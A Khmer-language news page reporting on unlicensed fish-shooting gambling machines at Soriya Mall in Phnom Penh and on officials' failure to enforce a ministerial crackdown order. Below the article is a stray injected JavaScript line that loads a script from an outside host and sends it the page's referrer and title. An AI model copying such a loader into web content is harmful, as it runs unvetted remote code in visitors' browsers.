ហ្គេមបាញ់ត្រី នៅផ្សារសូរិយាម៉លនៅតែបន្តដំណើរការយ៉ាងគគ្រឹកគគ្រេង ខណះដែល លោកអភិបាល ខណ្ឌឡើងថ្មី និងលោកអធិការខណ្ឌ មិនអនុវត្តន៍តាម អនុសាសន៍របស់សម្តេចក្រឡាហោម ស ខេង

5 ខែ មុន 493 តូ សុផល

ភ្នំពេញ៖ ទីតាំងហ្គេមបាញ់ត្រីជាង២០គ្រឿងដែលមានថៅកែល្បីឈ្មោះ ២នាក់នៅពីក្រោយខ្នង កំពុងបើក អោយលេងទាំងក្មេងចាស់ ទាំងប្រុសទាំងស្រី យ៉ាងគគ្រឹកគគ្រេង មិនឃើញមាន អាជ្ញាធរ សមត្ថកិច្ច និង ស្ថាប័នពាក់ព័ន្ធចុះត្រួតពិនិត្យ និងបង្ក្រាបសោះ។ ទីតាំងល្បែងហ្គេមបាញ់ត្រីដ៏ធំ និង មានចំនួនជាង២០គ្រឿង ដែលជ្រកក្រោមច្បាប់មណ្ឌលកំសាន្តនៅ ផ្សារសូរិយាម៉ល ផ្លូវ៥១ សង្កាត់ផ្សារថ្មី៣ ខណ្ឌដូនពេញ រាជធានីភ្នំពេញ ដែលមានថៅកែឈ្មោះ ចែគង់ និង ហៀហុង សម្របសម្រួលបើកដំណើរការយ៉ាងរលូននៅកណ្តាលទីក្រុងដែលគ្មានច្បាប់អនុញ្ញាត ហើយគ្មានស្ថាប័នពាក់ព័ន្ធ សមត្ថកិច្ច អាជ្ញាធរខណ្ឌ ស្ថាបនណាហ៊ានទៅក្បែរឡើយ ។

ប្រភពបានប្រាប់អោយដឹងថា កន្លែងល្បែងហ្គេមបាញ់ត្រីនៅក្នុងផ្សារសូរិយាម៉ល មានក្មេងប្រុសស្រី ប្រមូលផ្តុំសេពគ្រឿងញៀន ហើយតំបន់ខាង លើនោះត្រូវបានគេអោយឈ្មោះថា ម្តុំតាន់ប៉ា ដែលជា កន្លែង អសន្តិសុខ ដែលប្រជាពលរដ្ឋមិនហ៊ានទៅក្បែរផងអោយតែលឺឈ្មោះផ្សារសូរិយាម៉ល ។

ទាក់ទិនទៅនិងច្បាប់អនុញ្ញាតអំពីមណ្ឌលកំសាន្ត មានមន្ត្រីអាជ្ញាធរនៃសាលារាជធានីភ្នំពេញបាន ប្រាប់ អោយដឹងយ៉ាងខ្លីថា ប្រភេទហ្គេមបាញ់ត្រីមិនមានច្បាប់អនុញ្ញាតទេ តែប្រភេទល្បែង តាមម៉ាស៊ីន ជាលក្ខណៈ ហ្គេមតុក្កតាបានមានច្បាប់អនុញ្ញាតដោយគ្មានការស៊ីសងឡើយ ។

លោកនាយប៉ុស្ត៏ផ្សារថ្មី៣ បានប្រាប់អោយដឹងថា ទីតាំងហ្គេមបាញ់ត្រីខាងលើមានច្បាប់អនុញ្ញាតត្រឹមត្រូវ និង លោក សុខ ពេញវុធ អភិបាលខណ្ឌដូនពេញថ្មី ទើបមកទទួលតំណែងជំនួសលោក គួច ចំរើន បាន ប្រាប់អោយដឹងថា លោកសុំត្រួតពិនិត្យជាមួយគណៈកម្មការសាលាខណ្ឌដូនពេញសិន ដោយមានឯក សារសុំច្បាប់បើកដំណើរការមណ្ឌលកំសាន្ត ។
គួររំលឹកដែរថា កាលពីថ្ងៃទី២៦ ខែតុលា ឆ្នាំ២០១៦ នៅទីស្តីក្រសួងមហាផ្ទៃ សម្តេចក្រឡាហោម ស ខេង បានថ្លែងប្រាប់មន្ត្រីក្រោមឱវាទទាំងអស់ចូលរួមអនុវត្តវិធានការបង្ក្រាបល្បែងស៊ីសងខុសច្បាប់ ។
សម្តេចក្រឡាហោម ស ខេង ឧបនាយករដ្ឋមន្ត្រី រដ្ឋមន្ត្រីក្រសួងមហាផ្ទៃបានបញ្ជាឱ្យមន្ត្រី កងកំលាំងមាន សមត្ថកិច្ចពាក់ព័ន្ធទាំងអស់ ត្រូវរួមសហការគ្នាអនុវត្តសេចក្តីណែនាំស្តីពីការអនុវត្ត វិធានការបង្រ្កាបល្បែង ស៊ីសងខុសច្បាប់ និងតាមឃាត់ខ្លួន គ្រប់ម្ចាស់បើកល្បែងខុសច្បាប់ ពិសេសអ្នកឈរជាខ្នងបង្អែក និងអ្នក ឃុបឃិត ពីក្រោយ មកផ្តន្ទាទោសទៅតាមផ្លូវច្បាប់។ ជាងនេះទៅទៀត សម្តេចក្រឡាហោម ក៏បានបញ្ជាក់ ដែរថា នៅកម្ពុជាយើងសព្វថ្ងៃនេះ ល្បែងស៊ីសង មាន ២សណ្ឋាន រួមមាន ៖ ល្បែងស៊ីសងស្របច្បាប់ និង ល្បែងស៊ីសងមិនស្របច្បាប់ ។

សម្តេច បានបន្តទៀតថា នៅក្នុងសេចក្តីណែនាំនោះ គឺតម្រូវអោយមន្ត្រី កងកំលាំងមានសមត្ថកិច្ចទាំង អស់ បង្រ្កាបល្បែងស៊ីសង ខុសច្បាប់ ដែលបង្កការប៉ះពាល់ ដល់សណ្តាប់ធ្នាប់សាធារណៈ ប៉ះពាល់ សីលធម៌សង្គម និងជីវភាពរស់នៅរបស់ ប្រជាពលរដ្ឋ ពិសេសគឺការអនុវត្តគោលនយោបាយ ភូមិ ឃុំ មានសុវត្ថិភាព ឲរបស់ រាជដ្ឋាភិបាល។

សម្តេចក្រឡាហោម ស ខេង ក៏បានសង្កត់ធ្ងន់ដែរថា ចំពោះល្បែងស៊ីសងខុសច្បាប់ ដែលបានលបលួច បើក និងបានបើកជាចំហរ នៅតាមបណ្តាមូលដ្ឋានមួយចំនួន កន្លងមកនោះដូចជា៖ ល្បែងជ្រក ក្រោម ស្លាកល្បែងស្របច្បាប់ ឆ្នោត ឡូតូ ភ្នាល់ បាល់ ភ្នាល់អនឡាញ ល្បែងអ៊ិនធឺណេត ២៤ម៉ោង ឆ្នោតកន្ទុយ លេខ ល្បែងជល់ មាន់ ល្បែងភា្នល់ ទឹកភ្លៀង ល្បែងបាញ់ត្រី និងល្បែងនានា ដែលជ្រក ក្រោមល្បែង ក្មេង លេង និងទាំងអាជីវកម្មខុសច្បាប់ គឺត្រូវបានប្រកាសបិទទាំងស្រុង។

ដូចបងប្អូនជ្រាបហើយថា ឬសគុលនៃ អំពើចោរមក្ម ឆក់ ប្លន់ និងបទល្មើសនានា អំពើហិង្សាក្នុងគ្រូសារ សិស្សគេចសាលា ការចរាចរគ្រឿងញៀន បណ្តាលអោយសង្គមធ្លាក់ចុះ បាត់បង់ភាពរីកចំរើន និងការ អភិវឌ្ឍន៍ គឺបណ្តាល មកពីអាជ្ញាធរមូលដ្ឋានរួមគំនិត និងផ្តល់ឪកាសអោយ មេល្បែងបន្តបើកយ៉ាង គគ្លើនមិនញញឺតច្បាប់។
ពលរដ្ឋសង្ឃឹមថាការអាជ្ញាធរ គ្រប់លំដាប់ជាន់ថ្នាក់អនុវត្តន៍ច្បាប់អោយបានស្មើៗគ្នា ទាំងចំពោះអ្នកមាន និងអ្នក ទាំងអ្នកតូច និងអ្នកធំ កុំអោយដូចអ្វីដែលប្រជាពលរដ្ឋលើកឡើងថា “ច្បាប់អនុវត្តន៍បានតែ ចំពោះអ្នកក្រនោះ”៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

អាន៖  គណៈបញ្ជាការឯកភាពខណ្ឌដូនពេញ ចុះបង្ក្រាបទីតាំងល្បែងខុសច្បាប់មួយកន្លែង នៅផ្លូវ៥៣ ក្នុងសង្កាត់ផ្សារថ្មីទី១ ខណ្ឌដូនពេញ

 

 

ចប់ហើយ! ទីតាំងហ្គេមអនឡាញបង្កប់ល្បែងភ្នាល់រីកដូចផ្សិតក្នុងខណ្ឌទួលគោក អភិបាលខណ្ឌថា ភាគច្រើនមានច្បាប់!

1 ខែ មុន 211 តូ សុផល

បង្ក្រាបទីតាំងភ្នាល់បាល់អនឡាញ និងកត់កន្ទុយលេខឆ្នោតវៀតណាម ) យីហោ BWin Cafenet ឃាត់មនុស្ស៤នាក់

1 ខែ មុន 49 តូ សុផល

បង្ក្រាប និងឃាត់ខ្លួនជនជាជាតិចិនជាច្រើននាក់ កំពុងប្រមូលនាំគ្នាបើកល្បែងតាមប្រព័ន្ធ Online ខុសច្បាប់

1 ខែ មុន 178 តូ សុផល

លោក ឯក ឃុនឌឿន ថា លោក ប៉ាង លីដា ចុះពិនិត្យទីតាំងហ្គេមអនឡាញរីកដូចផ្សិតក្នុងទឹកដីទួលគោក ភាគច្រើនមានច្បាប់!

1 ខែ មុន 1054 តូ សុផល

ឯក ឃុន ឌឿន ប៉ាង លីដា និង អធិការខណ្ឌទទួលគោក ទទួលបានការគោរពកោតសរសើរ “រក្សាទីតាំងហ្គេមបង្កប់ល្បែងស៊ីសងគ្រប់ប្រភេទល្អប្រសើរ”!

1 ខែ មុន 421 តូ សុផល

ទូហ្គេម ជិត១០០ទូ ត្រូវបានធ្វេីពិធីវាយកំទេចចោល

1 ខែ មុន 26 តូ សុផល

ឃាត់អ្នកញៀនលេងហ្គេមតុក្កតា០៨នាក់យកមកអប់រំក្នុងនោះមានក្មេងតូចៗផង

1 ខែ មុន 22 តូ សុផល

អភិបាលខណ្ឌចំការមន មិនទុកអនុសាសន៍ សម្តេចក្រឡាហោម ស ខេង ក្នុងកែវភ្នែក!

1 ខែ មុន 1957 តូ សុផល

នេត សាវឿន ៖ មានល្បែងស៊ីសងនាំឲ្យមានបទល្មើសគ្រប់ប្រភេទ ដូច្នេះសមត្ថកិច្ចត្រូវតែខិតខំរួមគ្នាលុបបំបាត់ឲ្យបាន!

2 ខែ មុន 251 តូ សុផល

ទីតាំងហ្គេមបាញ់ត្រីតាមផ្លូវរថភ្លើងក្នុងសង្កាត់ទួលសង្កែ ខណ្ឌឬស្សីកែវនិងជាកន្លែងចែកចាយគ្រឿងញៀនត្រូវសមត្ថកិច្ចចុះបង្ក្រាបឆ្លើយតបទៅមហាជន

3 ខែ មុន 310 វីជ្ជា ស្លាប់រស់ជារឿងធម្មតា​
TOP
 

ទំនាក់ទំនង

លេខទូរស័ព្ទ: 0974444174, 017987600, 081810811 ម៉ោងធ្វើការ: ច័ន្ទ - សុក្រ ​​ (8am - 5pm) អុីមែល: info@tnn-news.com

បណ្តាញសង្គម